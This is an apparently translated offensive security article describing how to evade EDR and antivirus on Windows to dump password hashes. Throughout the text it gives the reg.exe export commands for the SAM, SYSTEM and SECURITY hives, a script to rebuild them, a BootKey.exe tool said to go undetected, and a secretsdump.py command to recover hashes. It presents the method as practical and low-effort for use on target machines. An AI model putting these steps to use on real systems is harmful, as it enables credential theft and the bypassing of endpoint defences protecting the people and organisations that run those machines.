
Windows绕过EDR实现DumpHash
Mediante el uso extendido del programa de confianza del sistema Reg.exe, se sortean hábilmente los puntos de interceptación del antivirus, logrando el objetivo de evadir el EDR para realizar un DumpHash.
Según las pruebas reales, este método es eficaz contra los sistemas de la familia Windows, no presenta una gran dificultad operativa y tiene valor práctico real.
Artículos prácticos de este proyecto:
Después de publicar el artículo, no se encontró el mismo enfoque en las comunidades nacionales ni en el extranjero, por lo que inicialmente se pensó que era un estreno mundial. Sin embargo, según los comentarios de los seguidores, un experto en el extranjero ya había compartido esta idea antes: Dumping LSA secrets: a story about task decorrelation
El código fuente y las versiones Release de este artículo ya están publicados en GitHub. Compartir no es fácil; si te parece bueno, puedes dejar una Star. ¡Muchas gracias!
En la máquina objetivo, ejecute los comandos para exportar los archivos .reg:
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Descargue los archivos .reg del primer paso a la máquina local y ejecute el script de PowerShell RegReduction.ps1 de este proyecto para restaurar los archivos binarios:
.\RegReduction.ps1
Nota: tras descargar el script desde GitHub, la codificación predeterminada es UTF-8; debe cambiarse a ANSI (GB2312) con el Bloc de notas para poder ejecutarlo correctamente.

En la máquina objetivo, ejecute el ejecutable BootKey.exe; el código fuente es el archivo BootKey.c de este proyecto:
BootKey.exe

Prueba de evasión del antivirus (2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

Este artículo incluye varias operaciones clave; los pasos principales en la máquina objetivo son solo dos:
reg.exe export para exportar el contenido clave del registro;BootKey.exe para exportar el BootKey del sistema.También se realizaron pruebas en diferentes sistemas, con los siguientes resultados:
reg.exe export para exportar el registro requiere privilegios de SYSTEM, mientras que en Windows Server 2022 y versiones anteriores solo se requieren privilegios normales de administrador (no se necesita SYSTEM). Si el archivo exportado con el comando reg.exe export tiene solo 1 KB, significa que los permisos no son suficientes.BootKey.exe para exportar el BootKey no requiere privilegios de administrador y, según lo comprobado, la mayoría de los antivirus (ninguno de los encontrados hasta ahora) no lo detectan ni bloquean.